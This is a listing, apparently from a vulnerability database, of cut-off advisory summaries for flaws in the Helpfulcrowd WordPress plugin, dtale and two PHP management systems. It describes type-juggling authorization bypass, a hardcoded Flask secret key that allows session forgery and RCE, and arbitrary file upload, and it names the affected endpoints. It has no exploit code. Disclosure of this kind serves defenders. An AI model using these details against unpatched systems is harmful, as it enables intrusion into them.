CVE-2026-8499

The Helpfulcrowd Product Reviews plugin for WordPress is vulnerable to Authorization Bypass via PHP Type Juggling in versions up to, and including, 1.2.9. This is due to the helpfulcrowdvalidatetoken function using a loose comparison operator != instead of a strict comparison !== when validating...

CVE-2026-8499 Helpfulcrowd Product Reviews <= 1.2.9 - Inccorect Authorization via Type Juggling in 'token' Parameter to Arbitrary Settings Update

The Helpfulcrowd Product Reviews plugin for WordPress is vulnerable to Authorization Bypass via PHP Type Juggling in versions up to, and including, 1.2.9. This is due to the helpfulcrowdvalidatetoken function using a loose comparison operator != instead of a strict comparison !== when validating...

PT-2026-47672

Name of the Vulnerable Software and Affected Versions Helpfulcrowd Product Reviews versions prior to 1.3.0 Description The Helpfulcrowd Product Reviews plugin for WordPress allows unauthenticated authorization bypass due to PHP Type Juggling. This occurs because the helpfulcrowd validate token...

Cross-site Scripting (XSS)

Overview dtale is a Web Client for Visualizing Pandas Objects Affected versions of this package are vulnerable to Cross-site Scripting XSS through the update-settings endpoint, allowing an attacker to use enablecustomfilters to specify custom filters will be used for exploitation of this...

Authentication Bypass / Remote Code Execution (RCE)

dtale is vulnerable to Authentication Bypass / Remote Code Execution RCE. The vulnerability is due to improper input validation and the presence of a hardcoded SECRETKEY in the Flask configuration, allowing attackers to forge a session cookie. Additionally, there is improper validation of custom...

CVE-2024-3408 Authentication Bypass and RCE in man-group/dtale

man-group/dtale version 3.10.0 is vulnerable to an authentication bypass and remote code execution RCE due to improper input validation. The vulnerability arises from a hardcoded SECRETKEY in the flask configuration, allowing attackers to forge a session cookie if authentication is enabled...

PT-2024-25690

Name of the Vulnerable Software and Affected Versions man-group/dtale version 3.10.0 Description The issue arises from improper input validation, leading to an authentication bypass and remote code execution RCE. A hardcoded SECRET KEY in the flask configuration allows attackers to forge a sessio...

PT-2022-27364 · Unknown · Online Leave Management System

Name of the Vulnerable Software and Affected Versions: Online Leave Management System version 1.0 Description: The issue allows attackers to execute arbitrary code via a crafted PHP file, exploiting an arbitrary file upload vulnerability at the "/leave system/classes/SystemSettings.php?f=update...

PT-2022-26282 · Unknown · Online Tours & Travels Management System

Name of the Vulnerable Software and Affected Versions: Online Tours & Travels Management System version 1.0 Description: The issue concerns arbitrary code execution. It can be exploited via the "ip/tour/admin/operations/update settings.php" API endpoint. Recommendations: For Online Tours & Travel...